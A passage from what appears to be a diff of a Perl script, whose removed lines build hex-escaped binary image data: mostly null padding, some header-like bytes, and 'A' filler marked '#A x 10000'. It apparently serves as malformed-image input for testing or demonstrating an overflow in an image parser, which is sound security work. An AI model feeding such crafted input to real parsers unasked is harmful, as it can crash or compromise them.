"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x1B\xA7\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD5\xF5\x3C\x00". - "\xE1\x00\x00\x00\x00\x00\x00\xE1\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00". - "\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5". - "\xF5\xF5\x00\x00\x0A\x2D\xF4\xA6\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xE4\xF4\x1E\x00\xFE\x00\x00\x00\x00\x00\x00\xFE\x00\xF3". - "\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF". 
- "\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x0C\x36\x53\xC4\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\xE7\x3F\x05\xE1". - "\x44\x81\x4A\xF1\x98\x3F\x60\xCE\x2A\xC7\x64\x7B\xFF\x5C\x34\x12\x5A\xFC\xF1\x18\xFF\xED\x46\x2E\x75\xE6\x00\x60\x00\xAD\x00\xA5". - "\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA\xE3\x55\x15\xAC\x5B\x97\x6F\x33\xF3\xCE\x9C\xCF\xDE\xC9\x90\x68". - "\x46\x5D\x97\x05\x59\x0C\x75\xE7\x02\xEC\x1E\x29\x4C\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x32\x01\x22\x00". - "\x20\x00\x00\x00\x00\x00\x00\x20\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00". - "\x22\x00\x1C\x00\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01". - "\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\xFA". - "\xE7\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD7\xF5\x3C\x00\xCB\x00\x00\x00\x00\x00\x00\xCB\x00\xFB\x00\x00\x00\x00\xFB\x00". 
- "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00". - "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x9F\x13\x34\xC5\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\xF5\xE5\xF4\x1E\x00\xEB\x00\x00\x00\x00\x00\x00\xEB\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00". - "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5". - "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\xEA\xE9\xD3\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00". - "\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x9C\xB3\x47\x8B\xFE\xBC\xC9\x2A\x98\x3F\x60\xCE\x2A\xC7\x64\xE4\xFF\x9D\x34\x4C". - "\x00\xFC\xDC\x18\x27\xED\x9F\x2E\x03\xE6\x00\x60\x00\xAD\x00\xA5\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA". - "\xD8\xF8\xE4\x44\xF4\xD6\x0A\x37\xF3\xCE\x9C\xCF\xDE\xC9\x90\xDD\x46\x89\x97\x64\x29\x0C\x4D\xE7\xE7\xEC\xC6\x29\x39\x12\x00\xFF". - "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x33\x01"."\x41" x 8; - #A x 10000 -my $img_data4 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
